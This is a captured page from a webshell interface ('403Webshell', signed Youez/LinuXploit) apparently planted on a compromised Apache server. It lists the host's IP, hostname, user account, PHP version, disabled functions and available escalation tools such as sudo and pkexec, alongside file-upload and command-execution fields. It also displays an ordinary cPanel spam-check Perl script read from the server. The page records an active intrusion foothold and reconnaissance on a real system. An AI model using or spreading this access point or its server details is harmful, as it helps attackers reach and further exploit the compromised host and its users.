403Webshell
Server IP : 101.53.144.229  /  Your IP : 216.73.216.181
Web Server : Apache
System : Linux host.gdigitalindia.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : digitalshiksha ( 1179)
PHP Version : 5.6.40
Disable Function : eval,show_source,system,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,show_source,curl_multi_exechellcmd, ini_restore,apache_get_modules,get_cfg_var,passthru, exec ,proc_get_status,fpassthru,c999_buff_prepare,c999_sess_put,c99_buff_prepare,c99_sess_put,proc_close,ini_alter,dl,symlink,link,proc_close,ini_alter,dl,symlink,link,mail
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /scripts//eximstats_spam_check
#!/usr/local/cpanel/3rdparty/bin/perl

# cpanel - scripts/eximstats_spam_check            Copyright 2022 cPanel, L.L.C.
#                                                           All rights reserved.
# copyright@cpanel.net                                         http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited

package scripts::eximstats_spam_check;

use strict;
use warnings;

use Cpanel::EximStats::SpamCheck ();

=head1 NAME

scripts::eximstats_spam_check

=head1 SYNOPSIS

    /usr/local/cpanel/scripts/eximstats_spam_check

=head1 DESCRIPTION

This script is used to query the eximstats database, and report possible
spammers.

=cut

run() if !caller();

sub run {
    local $@;
    my $ok = eval { Cpanel::EximStats::SpamCheck::run_spammer_check() };
    die $@ if $@;
    exit 0 if ($ok);
    exit 1;
}

1;

Youez - 2016 - github.com/yon3zu
LinuXploit